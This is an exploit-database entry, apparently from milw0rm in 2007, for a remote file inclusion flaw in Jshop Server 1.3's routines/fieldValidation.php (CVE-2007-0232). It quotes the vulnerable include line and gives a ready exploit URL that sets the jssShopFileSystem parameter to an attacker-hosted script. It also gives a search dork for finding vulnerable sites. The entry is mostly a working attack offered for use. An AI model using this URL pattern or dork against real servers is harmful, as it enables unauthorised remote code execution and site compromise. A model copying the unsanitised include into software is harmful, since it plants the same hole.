Jshop Server 1.3 - 'fieldValidation.php' Remote File Inclusion



EKU-ID: 11096 CVE: OSVDB-33459;CVE-2007-0232 OSVDB-ID:
Author: irvian Published: 2007-01-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


==========================================================================
# scripts       : Jshop Server 1.3
# Discovered By : irvian
# script        : http://www.jshop.co.uk/
# Thanks To     : #hitamputih #nyubicrew #patihack
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork          :powered by jshop
--------------------------------------------------------------------------
file: routines/fieldValidation.php

include($jssShopFileSystem."resources/includes/validations.php");


exploit : www.target.com/routines/fieldValidation.php?jssShopFileSystem=[evilcode]

# milw0rm.com [2007-01-10]